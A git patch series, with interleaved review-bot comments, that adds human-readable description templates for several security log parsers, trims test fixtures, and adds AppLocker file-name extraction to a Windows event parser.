--- a/Azure/azure-linux/tests/omsagent_command2.json +++ b/Azure/azure-linux/tests/omsagent_command2.json @@ -14,9 +14,6 @@ "azure_linux": { "message": "omsagent : TTY=unknown ; PWD=/ ; USER=root ; COMMAND=/bin/test -r /var/lib/docker/containers/bf64bddcdb7d18a3090980d2539e2c15c924138f489c280871941064850f7d16/bf64bddcdb7d18a3090980d2539e2c15c924138f489c280871941064850f7d16-json.log" }, - "host": { - "name": "LinuxRedhatDesktop" - }, "log": { "hostname": "LinuxRedhatDesktop", "level": "info" diff --git a/Azure/azure-linux/tests/session_closed.json b/Azure/azure-linux/tests/session_closed.json index 9bd908a00..824820fff 100644 --- a/Azure/azure-linux/tests/session_closed.json +++ b/Azure/azure-linux/tests/session_closed.json @@ -16,9 +16,6 @@ "azure_linux": { "message": "pam_unix(sudo:session): session closed for user root" }, - "host": { - "name": "LinuxRedhatDesktop" - }, "log": { "hostname": "LinuxRedhatDesktop", "level": "info" diff --git a/Azure/azure-linux/tests/session_opened.json b/Azure/azure-linux/tests/session_opened.json index 3d4effdb7..217cca4c3 100644 --- a/Azure/azure-linux/tests/session_opened.json +++ b/Azure/azure-linux/tests/session_opened.json @@ -16,9 +16,6 @@ "azure_linux": { "message": "pam_unix(sudo:session): session opened for user root by (uid=0)" }, - "host": { - "name": "LinuxRedhatDesktop" - }, "log": { "hostname": "LinuxRedhatDesktop", "level": "info" diff --git a/Azure/azure-linux/tests/systemd_session.json b/Azure/azure-linux/tests/systemd_session.json index 37cfb75f3..b84c4700d 100644 --- a/Azure/azure-linux/tests/systemd_session.json +++ b/Azure/azure-linux/tests/systemd_session.json @@ -16,9 +16,6 @@ "azure_linux": { "message": "Started Session 13124 of user omsagent." }, - "host": { - "name": "LinuxRedhatDesktop" - }, "log": { "hostname": "LinuxRedhatDesktop", "level": "info" From c5aadb611517017702d13872911946b05f1b4832 Mon Sep 17 00:00:00 2001 
From: LenaigKaliou Date: Thu, 10 Oct 2024 16:10:12 +0200 Subject: [PATCH 135/317] Added HAProxy smart description --- HAProxy/haproxy/_meta/smart-descriptions.json | 45 ++++++++++++++++++- 1 file changed, 44 insertions(+), 1 deletion(-) diff --git a/HAProxy/haproxy/_meta/smart-descriptions.json b/HAProxy/haproxy/_meta/smart-descriptions.json index fe51488c7..b41b1e6a3 100644 --- a/HAProxy/haproxy/_meta/smart-descriptions.json +++ b/HAProxy/haproxy/_meta/smart-descriptions.json @@ -1 +1,44 @@ -[] +[ + { + "value": "A {http.request.method} request was made to {url.original} from {source.ip} on host {log.hostname}", + "conditions": [ + { + "field": "http.request.method" + }, + { + "field": "log.hostname" + }, + { + "field": "url.original" + }, + { + "field": "source.ip" + } + ] + }, + { + "value": "A {http.request.method} request was made to {url.original} from {source.ip}", + "conditions": [ + { + "field": "http.request.method" + }, + { + "field": "url.original" + }, + { + "field": "source.ip" + } + ] + }, + { + "value": "A {http.request.method} request was made to {url.original}", + "conditions": [ + { + "field": "http.request.method" + }, + { + "field": "url.original" + } + ] + } +] From b7dc95470ea15a09c3b7745ba8b8a0a29133d0b0 Mon Sep 17 00:00:00 2001 From: LenaigKaliou Date: Thu, 10 Oct 2024 16:12:17 +0200 Subject: [PATCH 136/317] Updated tests for HAProxy --- HAProxy/haproxy/tests/json.json | 3 --- HAProxy/haproxy/tests/standard.json | 3 --- 2 files changed, 6 deletions(-) diff --git a/HAProxy/haproxy/tests/json.json b/HAProxy/haproxy/tests/json.json index 4ee805c37..43c00bbac 100644 --- a/HAProxy/haproxy/tests/json.json +++ b/HAProxy/haproxy/tests/json.json @@ -27,9 +27,6 @@ "subdomain": "backoffice", "top_level_domain": "fr" }, - "host": { - "name": "B96f1GJTxDUKbh2l" - }, "http": { "request": { "method": "GET" diff --git a/HAProxy/haproxy/tests/standard.json b/HAProxy/haproxy/tests/standard.json index 6886d242c..faf509d78 100644 
--- a/HAProxy/haproxy/tests/standard.json +++ b/HAProxy/haproxy/tests/standard.json @@ -14,9 +14,6 @@ "event": { "kind": "access" }, - "host": { - "name": "B96f1GJTxDUKbh2l" - }, "http": { "request": { "method": "GET" From da24fc2e391490fbdd5769386774446e2c69e6bb Mon Sep 17 00:00:00 2001 From: LenaigKaliou Date: Thu, 10 Oct 2024 16:22:07 +0200 Subject: [PATCH 137/317] Smart descriptions for IBM AIX --- IBM/ibm-aix/_meta/smart-descriptions.json | 54 ++++++++++++++++++++++- 1 file changed, 53 insertions(+), 1 deletion(-) diff --git a/IBM/ibm-aix/_meta/smart-descriptions.json b/IBM/ibm-aix/_meta/smart-descriptions.json index 0967ef424..91d1029ff 100644 --- a/IBM/ibm-aix/_meta/smart-descriptions.json +++ b/IBM/ibm-aix/_meta/smart-descriptions.json @@ -1 +1,53 @@ -{} +[ + { + "value": "{action.target} event \"{event.action}\" was effectuated by {user.name} (status: {action.status})", + "conditions": + [ + { + "field": "action.status" + }, + { + "field": "action.target" + }, + { + "field": "event.action" + }, + { + "field": "user.name" + } + ] + }, + { + "value": "{action.target} event \"{event.action}\" was effectuated by user {user.id} (status: {action.status})", + "conditions": + [ + { + "field": "action.status" + }, + { + "field": "action.target" + }, + { + "field": "event.action" + }, + { + "field": "user.id" + } + ] + }, + { + "value": "{action.target} event \"{event.action}\" was effectuated (status: {action.status})", + "conditions": + [ + { + "field": "action.status" + }, + { + "field": "action.target" + }, + { + "field": "event.action" + } + ] + } +] \ No newline at end of file From 6e6a5bbc9f7f0eff96e498e9908ddea96c6c86f9 Mon Sep 17 00:00:00 2001 From: LenaigKaliou Date: Thu, 10 Oct 2024 16:24:16 +0200 Subject: [PATCH 138/317] Adding a generic smart description for the IBM AIX module --- IBM/ibm-aix/_meta/smart-descriptions.json | 12 ++++++++++++ 1 file changed, 12 insertions(+) 
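Review bot: The new IBM AIX file puts each `"conditions":` key on its own line with the opening bracket beneath it and ends without a trailing newline, whereas the other smart-descriptions files in this series (Postfix, Azure Linux, HAProxy) keep `"conditions": [` on one line and end with a newline; the ISC DHCP and Log Insight Windows files added in the following commits repeat the same layout. Running the file through the repository's JSON formatter (the linter applied to `parser.yml` earlier in the series, or `jq .`) would keep the catalogue uniform. The phrase `was effectuated` in the three templates reads awkwardly as user-facing text; `was performed` says the same thing plainly.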
diff --git a/IBM/ibm-aix/_meta/smart-descriptions.json b/IBM/ibm-aix/_meta/smart-descriptions.json index 91d1029ff..b333d6eb3 100644 --- a/IBM/ibm-aix/_meta/smart-descriptions.json +++ b/IBM/ibm-aix/_meta/smart-descriptions.json @@ -49,5 +49,17 @@ "field": "event.action" } ] + }, + { + "value": "{action.target} event \"{event.action}\" was effectuated", + "conditions": + [ + { + "field": "action.target" + }, + { + "field": "event.action" + } + ] } ] \ No newline at end of file From fb5cb49d5418b89bc082d57b5dfaa141e1dba71e Mon Sep 17 00:00:00 2001 From: LenaigKaliou Date: Thu, 10 Oct 2024 16:33:06 +0200 Subject: [PATCH 139/317] Smart Descriptions for ISC DHCP --- ISC DHCP/dhcpd/_meta/smart-descriptions.json | 63 +++++++++++++++++++- 1 file changed, 62 insertions(+), 1 deletion(-) diff --git a/ISC DHCP/dhcpd/_meta/smart-descriptions.json b/ISC DHCP/dhcpd/_meta/smart-descriptions.json index fe51488c7..f17e71690 100644 --- a/ISC DHCP/dhcpd/_meta/smart-descriptions.json +++ b/ISC DHCP/dhcpd/_meta/smart-descriptions.json 
@@ -1 +1,62 @@
-[]
+[
+ {
+ "value": "A {dhcpd.query} query has been launched with {event.outcome} from {source.address} to {destination.address}",
+ "conditions":
+ [
+ {
+ "field": "dhcpd.query"
+ },
+ {
+ "field": "destination.address"
+ },
+ {
+ "field": "event.outcome"
+ },
+ {
+ "field": "source.address"
+ }
+ ]
+ },
+ {
+ "value": "A {dhcpd.query} query has been launched with {event.outcome} from {source.address}",
+ "conditions":
+ [
+ {
+ "field": "dhcpd.query"
+ },
+ {
+ "field": "event.outcome"
+ },
+ {
+ "field": "source.address"
+ }
+ ]
+ },
+ {
+ "value": "A {dhcpd.query} query has been launched with {event.outcome} to {destination.address}",
+ "conditions":
+ [
+ {
+ "field": "dhcpd.query"
+ },
+ {
+ "field": "destination.address"
+ },
+ {
+ "field": "event.outcome"
+ }
+ ]
+ },
+ {
+ "value": "A {dhcpd.query} query has been launched with {event.outcome}",
+ "conditions":
+ [
+ {
+ "field": "dhcpd.query"
+ },
+ {
+ "field": "event.outcome"
+ }
+ ]
+ }
+]
From b8bafa3d8fae5a800631a1141208253ba0b9b686 Mon Sep 17 00:00:00 2001
From: LenaigKaliou
Date: Mon, 14 Oct 2024 15:52:01 +0200
Subject: [PATCH 140/317] Smart descriptions for Log Insight Windows agent
---
 .../_meta/smart-descriptions.json | 60 ++++++++++++++++++-
 1 file changed, 59 insertions(+), 1 deletion(-)
diff --git a/Log Insight Windows/log-insight-windows/_meta/smart-descriptions.json b/Log Insight Windows/log-insight-windows/_meta/smart-descriptions.json
index fe51488c7..98457f5df 100644
--- a/Log Insight Windows/log-insight-windows/_meta/smart-descriptions.json
+++ b/Log Insight Windows/log-insight-windows/_meta/smart-descriptions.json
@@ -1 +1,59 @@
-[]
+[
+ {
+ "value": "Action ID {action.id}: {action.name} on target {user.target.name}.",
+ "conditions":
+ [
+ {
+ "field": "action.id"
+ },
+ {
+ "field": "action.name"
+ },
+ {
+ "field": "user.target.name"
+ }
+ ]
+ },
+ {
+ "value": "A {event.type[0]} {event.category[0]} event was launched with {event.outcome} on target {user.target.name}.",
+ "conditions":
+ [
+ {
+ "field": "event.type"
+ },
+ {
+ "field": "event.category"
+ },
+ {
+ "field": "event.outcome"
+ },
+ {
+ "field": "user.target.name"
+ }
+ ]
+ },
+ {
+ "value": "{action.name} on target {user.target.name}.",
+ "conditions":
+ [
+ {
+ "field": "action.name"
+ },
+ {
+ "field": "user.target.name"
+ }
+ ]
+ },
+ {
+ "value": "{action.name} by {user.name}.",
+ "conditions":
+ [
+ {
+ "field": "action.name"
+ },
+ {
+ "field": "user.name"
+ }
+ ]
+ }
+]
From b3b5242f5aee3dbdaffc6640240c462abdc0f70e Mon Sep 17 00:00:00 2001
From: LenaigKaliou
Date: Mon, 14 Oct 2024 15:54:31 +0200
Subject: [PATCH 141/317] small fix
---
 .../log-insight-windows/_meta/smart-descriptions.json | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)
diff --git a/Log Insight Windows/log-insight-windows/_meta/smart-descriptions.json b/Log Insight Windows/log-insight-windows/_meta/smart-descriptions.json
index 98457f5df..e77c3c1d3 100644
--- a/Log Insight Windows/log-insight-windows/_meta/smart-descriptions.json
+++ b/Log Insight Windows/log-insight-windows/_meta/smart-descriptions.json
@@ -15,7 +15,7 @@
 ]
 },
 {
- "value": "A {event.type[0]} {event.category[0]} event was launched with {event.outcome} on target {user.target.name}.",
+ "value": "A {event.type.0} {event.category.0} event was launched with {event.outcome} on target {user.target.name}.",
 "conditions":
 [
 {
From fa9a11ee993dce4c019928d603c4e428ea8424f0 Mon Sep 17 00:00:00 2001
From: LenaigKaliou
Date: Mon, 14 Oct 2024 15:56:08 +0200
Subject: [PATCH 142/317] Small fix
---
 .../log-insight-windows/_meta/smart-descriptions.json | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)
diff --git a/Log Insight Windows/log-insight-windows/_meta/smart-descriptions.json b/Log Insight Windows/log-insight-windows/_meta/smart-descriptions.json
index e77c3c1d3..5a77c98b3 100644
--- a/Log Insight Windows/log-insight-windows/_meta/smart-descriptions.json
+++ b/Log Insight Windows/log-insight-windows/_meta/smart-descriptions.json
@@ -15,7 +15,7 @@
 ]
 },
 {
- "value": "A {event.type.0} {event.category.0} event was launched with {event.outcome} on target {user.target.name}.",
+ "value": "A {event.type | first} {event.category | first} event was launched with {event.outcome} on target {user.target.name}.",
 "conditions":
 [
 {
From 1712be8e920cd9522d0c0dad222a262919f3ea8c Mon Sep 17 00:00:00 2001
From: LenaigKaliou
Date: Mon, 14 Oct 2024 15:57:30 +0200
Subject: [PATCH 143/317] small fix
---
 .../log-insight-windows/_meta/smart-descriptions.json | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)
diff --git a/Log Insight Windows/log-insight-windows/_meta/smart-descriptions.json b/Log Insight Windows/log-insight-windows/_meta/smart-descriptions.json
index 5a77c98b3..2b726495d 100644
--- a/Log Insight Windows/log-insight-windows/_meta/smart-descriptions.json
+++ b/Log Insight Windows/log-insight-windows/_meta/smart-descriptions.json
@@ -15,7 +15,7 @@
 ]
 },
 {
- "value": "A {event.type | first} {event.category | first} event was launched with {event.outcome} on target {user.target.name}.",
+ "value": "A {event.type} {event.category} event was launched with {event.outcome} on target {user.target.name}.",
 "conditions":
 [
 {
From 8407aeaa71822e09709e7990c46589bd3635bab3 Mon Sep 17 00:00:00 2001
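Review bot: After three rewrites of this entry (`{event.type[0]}`, `{event.type.0}`, `{event.type | first}`) the final text interpolates `{event.type}` and `{event.category}` directly, and in ECS both fields are arrays; if the description engine renders a list value verbatim, the description will contain bracketed lists instead of single words. The churn suggests no supported syntax for indexing a list field was found; if there is none, dropping the two placeholders, e.g. `"value": "An event was launched with {event.outcome} on target {user.target.name}.",`, gives a description that renders predictably, and the `event.type`/`event.category` conditions can stay as presence checks. How the engine renders lists is inferred, not visible here.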
From: LenaigKaliou
Date: Mon, 14 Oct 2024 16:07:02 +0200
Subject: [PATCH 144/317] Smart Descriptions for Panda Security Aether
---
 .../Aether/_meta/smart-descriptions.json | 84 ++++++++++++++++++-
 1 file changed, 83 insertions(+), 1 deletion(-)
diff --git a/Panda Security/Aether/_meta/smart-descriptions.json b/Panda Security/Aether/_meta/smart-descriptions.json
index fe51488c7..db8286e45 100644
--- a/Panda Security/Aether/_meta/smart-descriptions.json
+++ b/Panda Security/Aether/_meta/smart-descriptions.json
@@ -1 +1,83 @@
-[]
+[
+ {
+ "value": "A {event.category} {event.type} event of {event.kind} kind was launched",
+ "conditions": [
+ {
+ "field": "event.category"
+ },
+ {
+ "field": "event.type"
+ },
+ {
+ "field": "event.kind"
+ }
+ ]
+ },
+ {
+ "value": "A {action.name} action was launched on the {host.type} host {host.name}",
+ "conditions": [
+ {
+ "field": "action.name"
+ },
+ {
+ "field": "host.type"
+ },
+ {
+ "field": "host.name"
+ }
+ ]
+ },
+ {
+ "value": "A {action.name} action was launched on the host {host.name}",
+ "conditions": [
+ {
+ "field": "action.name"
+ },
+ {
+ "field": "host.name"
+ }
+ ]
+ },
+ {
+ "value": "A {action.name} action was launched on the {host.type} host {host.name}. Reason: {event.reason}",
+ "conditions": [
+ {
+ "field": "action.name"
+ },
+ {
+ "field": "event.reason"
+ },
+ {
+ "field": "host.type"
+ },
+ {
+ "field": "host.name"
+ }
+ ]
+ },
+ {
+ "value": "A {action.name} action was launched on the host {host.name}",
+ "conditions": [
+ {
+ "field": "action.name"
+ },
+ {
+ "field": "host.name"
+ }
+ ]
+ },
+ {
+ "value": "A {action.name} action was launched on the host {host.name}. Reason: {event.reason}",
+ "conditions": [
+ {
+ "field": "action.name"
+ },
+ {
+ "field": "event.reason"
+ },
+ {
+ "field": "host.name"
+ }
+ ]
+ }
+]
From df533ce7d7997a5a7bb707b0adebcf0b7d516b98 Mon Sep 17 00:00:00 2001
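Review bot: Entries 3 and 5 of the new file are identical (`"A {action.name} action was launched on the host {host.name}"` with conditions `action.name` and `host.name`), so one of them is dead and should be dropped. Entry 3 also comes before entries 4 and 6, whose conditions are a superset of its own (`event.reason`, plus `host.type` for entry 4); if the engine takes the first matching entry, the two `Reason: {event.reason}` descriptions can never be selected, so the entries should be ordered most-specific first as in the IBM AIX file of this series. The first-match rule is inferred, not visible here.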
From: LenaigKaliou
Date: Mon, 14 Oct 2024 16:10:49 +0200
Subject: [PATCH 145/317] Addition of a smart description in the Aether module
---
 .../Aether/_meta/smart-descriptions.json | 33 +++++++++++++++++++
 1 file changed, 33 insertions(+)
diff --git a/Panda Security/Aether/_meta/smart-descriptions.json b/Panda Security/Aether/_meta/smart-descriptions.json
index db8286e45..dc68a245b 100644
--- a/Panda Security/Aether/_meta/smart-descriptions.json
+++ b/Panda Security/Aether/_meta/smart-descriptions.json
@@ -79,5 +79,38 @@
 "field": "host.name"
 }
 ]
+ },
+ {
+ "value": "{event.reason} on the {host.type} host {host.name}",
+ "conditions": [
+ {
+ "field": "event.reason"
+ },
+ {
+ "field": "host.type"
+ },
+ {
+ "field": "host.name"
+ }
+ ]
+ },
+ {
+ "value": "{event.reason} on the host {host.name}",
+ "conditions": [
+ {
+ "field": "event.reason"
+ },
+ {
+ "field": "host.name"
+ }
+ ]
+ },
+ {
+ "value": "{event.reason}",
+ "conditions": [
+ {
+ "field": "event.reason"
+ }
+ ]
 }
 ]
From 1892bb12e3649bfd3917a3d5f0639dd4289cbe29 Mon Sep 17 00:00:00 2001
From: LenaigKaliou
Date: Mon, 14 Oct 2024 16:14:45 +0200
Subject: [PATCH 146/317] Smart Descriptions for Panda Security SIEM Feeder
---
 .../SIEM Feeder/_meta/smart-descriptions.json | 59 ++++++++++++++++++-
 1 file changed, 58 insertions(+), 1 deletion(-)
diff --git a/Panda Security/SIEM Feeder/_meta/smart-descriptions.json b/Panda Security/SIEM Feeder/_meta/smart-descriptions.json
index fe51488c7..8d432c0c2 100644
--- a/Panda Security/SIEM Feeder/_meta/smart-descriptions.json
+++ b/Panda Security/SIEM Feeder/_meta/smart-descriptions.json
@@ -1 +1,58 @@
-[]
+[
+ {
+ "value": "A {event.category} {event.type} event was launched on host {host.name} by {source.address}",
+ "conditions": [
+ {
+ "field": "event.category"
+ },
+ {
+ "field": "event.type"
+ },
+ {
+ "field": "host.name"
+ },
+ {
+ "field": "source.address"
+ }
+ ]
+ },
+ {
+ "value": "A {event.category} {event.type} event was launched on host {host.name}",
+ "conditions": [
+ {
+ "field": "event.category"
+ },
+ {
+ "field": "event.type"
+ },
+ {
+ "field": "host.name"
+ }
+ ]
+ },
+ {
+ "value": "A {event.category} {event.type} event was launched by {source.address}",
+ "conditions": [
+ {
+ "field": "event.category"
+ },
+ {
+ "field": "event.type"
+ },
+ {
+ "field": "source.address"
+ }
+ ]
+ },
+ {
+ "value": "A {event.category} {event.type} event was launched",
+ "conditions": [
+ {
+ "field": "event.category"
+ },
+ {
+ "field": "event.type"
+ }
+ ]
+ }
+]
From 83ad458e12d53c938a73f01e6a79e1d543b79432 Mon Sep 17 00:00:00 2001
From: LenaigKaliou
Date: Mon, 14 Oct 2024 16:21:13 +0200
Subject: [PATCH 147/317] Add smart descriptions for SpamAssassin
---
 .../_meta/smart-descriptions.json | 47 ++++++++++++++++++-
 1 file changed, 46 insertions(+), 1 deletion(-)
diff --git a/SpamAssassin/spamassassin/_meta/smart-descriptions.json b/SpamAssassin/spamassassin/_meta/smart-descriptions.json
index fe51488c7..71479ec8b 100644
--- a/SpamAssassin/spamassassin/_meta/smart-descriptions.json
+++ b/SpamAssassin/spamassassin/_meta/smart-descriptions.json
@@ -1 +1,46 @@
-[]
+[
+ {
+ "value": "An event initiated by {source.address} has been launched.",
+ "conditions": [
+ {
+ "field": "source.address"
+ }
+ ]
+ },
+ {
+ "value": "An event initiated by {source.address} has been launched. It is related to user {user.name}.",
+ "conditions": [
+ {
+ "field": "source.address"
+ },
+ {
+ "field": "user.name"
+ }
+ ]
+ },
+ {
+ "value": "An event initiated by {source.address} has been launched on port {source.port}.",
+ "conditions": [
+ {
+ "field": "source.address"
+ },
+ {
+ "field": "source.port"
+ }
+ ]
+ },
+ {
+ "value": "An event initiated by {source.address} has been launched on port {source.port}. It is related to user {user.name}.",
+ "conditions": [
+ {
+ "field": "source.address"
+ },
+ {
+ "field": "source.port"
+ },
+ {
+ "field": "user.name"
+ }
+ ]
+ }
+]
From 04b1d76f38638f82e2fe1a38cebf9adde64087ba Mon Sep 17 00:00:00 2001
From: LenaigKaliou
Date: Mon, 14 Oct 2024 16:36:43 +0200
Subject: [PATCH 148/317] Smart Descriptions for Alsid
---
 Tenable/alsid/_meta/smart-descriptions.json | 116 +++++++++++++++++++-
 1 file changed, 115 insertions(+), 1 deletion(-)
diff --git a/Tenable/alsid/_meta/smart-descriptions.json b/Tenable/alsid/_meta/smart-descriptions.json
index fe51488c7..228fbe5f8 100644
--- a/Tenable/alsid/_meta/smart-descriptions.json
+++ b/Tenable/alsid/_meta/smart-descriptions.json
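Review bot: The first entry requires only `source.address`, and each of the other three requires `source.address` plus more, so if the engine takes the first matching entry the `source.port` and `user.name` variants are unreachable; ordering the four-condition entry first and the `source.address`-only fallback last makes every description reachable. Whether the engine picks the first match or the most specific one is not visible here; if it is the latter the order is harmless, but the IBM AIX file in this series already uses most-specific-first, so aligning with it costs nothing.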
@@ -1 +1,115 @@
-[]
+[
+ {
+ "value": "The {action.properties.alertSeverityLevel} {action.type} action {action.name} was launched with {action.outcome}. Event ID: {action.properties.eventID}",
+ "conditions": [
+ {
+ "field": "action.properties.alertSeverityLevel"
+ },
+ {
+ "field": "action.type",
+ "value": "alert"
+ },
+ {
+ "field": "action.outcome"
+ },
+ {
+ "field": "action.name"
+ },
+ {
+ "field": "action.properties.eventID"
+ }
+ ]
+ },
+ {
+ "value": "The {action.properties.alertSeverityLevel} {action.type} action {action.name} was launched with {action.outcome} by user {user.name}. Event ID: {action.properties.eventID}",
+ "conditions": [
+ {
+ "field": "action.properties.alertSeverityLevel"
+ },
+ {
+ "field": "action.type",
+ "value": "alert"
+ },
+ {
+ "field": "action.outcome"
+ },
+ {
+ "field": "action.name"
+ },
+ {
+ "field": "action.properties.eventID"
+ },
+ {
+ "field": "user.name"
+ }
+ ]
+ },
+ {
+ "value": "The {action.type} action {action.name} was launched with {action.outcome} by {user.name}. Event ID: {action.properties.eventID}",
+ "conditions": [
+ {
+ "field": "action.type"
+ },
+ {
+ "field": "action.properties.eventID"
+ },
+ {
+ "field": "action.outcome"
+ },
+ {
+ "field": "action.name"
+ },
+ {
+ "field": "user.name"
+ }
+ ]
+ },
+ {
+ "value": "The {action.type} action {action.name} was launched with {action.outcome}. 
Event ID: {action.properties.eventID}",
+ "conditions": [
+ {
+ "field": "action.type"
+ },
+ {
+ "field": "action.outcome"
+ },
+ {
+ "field": "action.name"
+ },
+ {
+ "field": "action.properties.eventID"
+ }
+ ]
+ },
+ {
+ "value": "The {action.type} action {action.name} was launched with {action.outcome} by {user.name}.",
+ "conditions": [
+ {
+ "field": "action.type"
+ },
+ {
+ "field": "action.outcome"
+ },
+ {
+ "field": "action.name"
+ },
+ {
+ "field": "user.name"
+ }
+ ]
+ },
+ {
+ "value": "The {action.type} action {action.name} was launched with {action.outcome}.",
+ "conditions": [
+ {
+ "field": "action.type"
+ },
+ {
+ "field": "action.outcome"
+ },
+ {
+ "field": "action.name"
+ }
+ ]
+ }
+]
From 55a12688f98efefc0b970b8f3fe1df8f62835791 Mon Sep 17 00:00:00 2001
From: LenaigKaliou
Date: Mon, 14 Oct 2024 16:41:54 +0200
Subject: [PATCH 149/317] Add SmartDescription for the 'alsid' plugin
---
 Tenable/alsid/_meta/smart-descriptions.json | 19 +++++++++++++++++++
 1 file changed, 19 insertions(+)
diff --git a/Tenable/alsid/_meta/smart-descriptions.json b/Tenable/alsid/_meta/smart-descriptions.json
index 228fbe5f8..7deb8c52b 100644
--- a/Tenable/alsid/_meta/smart-descriptions.json
+++ b/Tenable/alsid/_meta/smart-descriptions.json
@@ -111,5 +111,24 @@
 "field": "action.name"
 }
 ]
+ },
+ {
+ "value": "A {action.type} action has been launched. Event ID: {action.properties.eventID}",
+ "conditions": [
+ {
+ "field": "action.type"
+ },
+ {
+ "field": "action.properties.eventID"
+ }
+ ]
+ },
+ {
+ "value": "A {action.type}action has been launched.",
+ "conditions": [
+ {
+ "field": "action.type"
+ }
+ ]
 }
 ]
From bccdaddaa3571b9cc5a0299132aad62741b2b309 Mon Sep 17 00:00:00 2001
From: LenaigKaliou
Date: Mon, 14 Oct 2024 16:42:20 +0200
Subject: [PATCH 150/317] Fixing typo
---
 Tenable/alsid/_meta/smart-descriptions.json | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)
diff --git a/Tenable/alsid/_meta/smart-descriptions.json b/Tenable/alsid/_meta/smart-descriptions.json
index 7deb8c52b..892e69d02 100644
--- a/Tenable/alsid/_meta/smart-descriptions.json
+++ b/Tenable/alsid/_meta/smart-descriptions.json
@@ -124,7 +124,7 @@
 ]
 },
 {
- "value": "A {action.type}action has been launched.",
+ "value": "A {action.type} action has been launched.",
 "conditions": [
 {
 "field": "action.type"
From eb86b34b28ddeffb8caab2347759e2ba055655e5 Mon Sep 17 00:00:00 2001
From: LenaigKaliou
Date: Mon, 14 Oct 2024 17:44:37 +0200
Subject: [PATCH 151/317] Addition of files fields for events 8002 and 8005
---
 Windows/windows/ingest/parser.yml | 5 ++
 Windows/windows/tests/process_8002.json | 72 +++++++++++++++++++++++++
 Windows/windows/tests/process_8005.json | 72 +++++++++++++++++++++++++
 3 files changed, 149 insertions(+)
 create mode 100644 Windows/windows/tests/process_8002.json
 create mode 100644 Windows/windows/tests/process_8005.json
diff --git a/Windows/windows/ingest/parser.yml b/Windows/windows/ingest/parser.yml
index fe3cbc5db..9c8ae969f 100644
--- a/Windows/windows/ingest/parser.yml
+++ b/Windows/windows/ingest/parser.yml
@@ -212,6 +212,11 @@ stages:
 file.hash.sha256: "{{parsed_hashes_kv.result.SHA256}}"
 filter: "{{json.event.EventID in (15,23,24,28) }}"
 
+ - set:
+ file.name: '{{json.event.Message.split(" ")[0].split("\\")[-1]}}'
+ file.path: "{{json.event.Message.split(' ')[0]}}"
+ filter: "{{json.event.EventID in (8002, 8005)}}"
+
 finalize:
 actions:
 - set:
diff --git a/Windows/windows/tests/process_8002.json b/Windows/windows/tests/process_8002.json
new file mode 100644
index 000000000..2fa32d712
--- /dev/null
+++ b/Windows/windows/tests/process_8002.json
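Review bot: `json.event.Message.split(" ")[0]` cuts the AppLocker path at the first space, so a message like `%OSDRIVE%\USERS\ACCOUNT\MY APP\tool.exe was allowed to run.` (constructed example) yields `file.path` = `%OSDRIVE%\USERS\ACCOUNT\MY` and `file.name` = `MY`; neither new fixture has a space in its path, so the tests do not exercise this. Splitting on the verb phrase keeps the whole path: `file.name: '{{json.event.Message.split(" was ")[0].split("\\")[-1]}}'` and `file.path: "{{json.event.Message.split(' was ')[0]}}"`. The filter only checks `EventID`, so if `Message` is ever absent the `.split` on an undefined value may fail depending on how the template engine treats undefined; a `Message` presence check in the filter would make the stage safe. As far as I know the neighbouring AppLocker IDs for audited and blocked executions carry the same message shape, and those are the events a detection cares about most, so the filter could be widened once checked against samples.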
@@ -0,0 +1,72 @@
+{
+ "input": {
+ "sekoiaio": {
+ "intake": {
+ "dialect": "Windows",
+ "dialect_uuid": "9281438c-f7c3-4001-9bcc-45fd108ba1be"
+ }
+ },
+ "message": "{\"EventTime\":\"2024-10-02 10:42:24\",\"Hostname\":\"HOST.test.fr\",\"Keywords\":-9223372036854775808,\"EventType\":\"INFO\",\"SeverityValue\":2,\"Severity\":\"INFO\",\"EventID\":8002,\"SourceName\":\"Microsoft-Windows-AppLocker\",\"ProviderGuid\":\"{CBDA4DBF-8D5D-4F69-9578-BE14AA540D22}\",\"Version\":0,\"Task\":0,\"OpcodeValue\":0,\"RecordNumber\":1812526,\"ProcessID\":2476,\"ThreadID\":2720,\"Channel\":\"Microsoft-Windows-AppLocker/EXE and DLL\",\"Domain\":\"NT AUTHORITY\",\"AccountName\":\"SYSTEM\",\"UserID\":\"S-1-2-34\",\"AccountType\":\"User\",\"Message\":\"%SYSTEM32%\\\\TEST\\\\APP.EXE was allowed to run.\",\"Opcode\":\"Info\",\"EventReceivedTime\":\"2024-10-02 10:42:25\",\"SourceModuleName\":\"eventlog\",\"SourceModuleType\":\"im_msvistalog\"}"
+ },
+ "expected": {
+ "message": "{\"EventTime\":\"2024-10-02 10:42:24\",\"Hostname\":\"HOST.test.fr\",\"Keywords\":-9223372036854775808,\"EventType\":\"INFO\",\"SeverityValue\":2,\"Severity\":\"INFO\",\"EventID\":8002,\"SourceName\":\"Microsoft-Windows-AppLocker\",\"ProviderGuid\":\"{CBDA4DBF-8D5D-4F69-9578-BE14AA540D22}\",\"Version\":0,\"Task\":0,\"OpcodeValue\":0,\"RecordNumber\":1812526,\"ProcessID\":2476,\"ThreadID\":2720,\"Channel\":\"Microsoft-Windows-AppLocker/EXE and DLL\",\"Domain\":\"NT AUTHORITY\",\"AccountName\":\"SYSTEM\",\"UserID\":\"S-1-2-34\",\"AccountType\":\"User\",\"Message\":\"%SYSTEM32%\\\\TEST\\\\APP.EXE was allowed to run.\",\"Opcode\":\"Info\",\"EventReceivedTime\":\"2024-10-02 10:42:25\",\"SourceModuleName\":\"eventlog\",\"SourceModuleType\":\"im_msvistalog\"}",
+ "event": {
+ "code": "8002",
+ "message": "%SYSTEM32%\\TEST\\APP.EXE was allowed to run.",
+ "provider": "Microsoft-Windows-AppLocker"
+ },
+ "action": {
+ "id": 8002,
+ "properties": {
+ "AccountName": "SYSTEM",
+ "AccountType": "User",
+ "Domain": "NT AUTHORITY", 
+ "EventType": "INFO",
+ "Keywords": "-9223372036854775808",
+ "OpcodeValue": 0,
+ "ProviderGuid": "{CBDA4DBF-8D5D-4F69-9578-BE14AA540D22}",
+ "Severity": "INFO",
+ "SourceName": "Microsoft-Windows-AppLocker",
+ "Task": 0
+ },
+ "record_id": 1812526,
+ "type": "Microsoft-Windows-AppLocker/EXE and DLL"
+ },
+ "file": {
+ "name": "APP.EXE",
+ "path": "%SYSTEM32%\\TEST\\APP.EXE"
+ },
+ "host": {
+ "hostname": "HOST.test.fr",
+ "name": "HOST.test.fr"
+ },
+ "log": {
+ "hostname": "HOST.test.fr",
+ "level": "info"
+ },
+ "os": {
+ "family": "windows",
+ "platform": "windows"
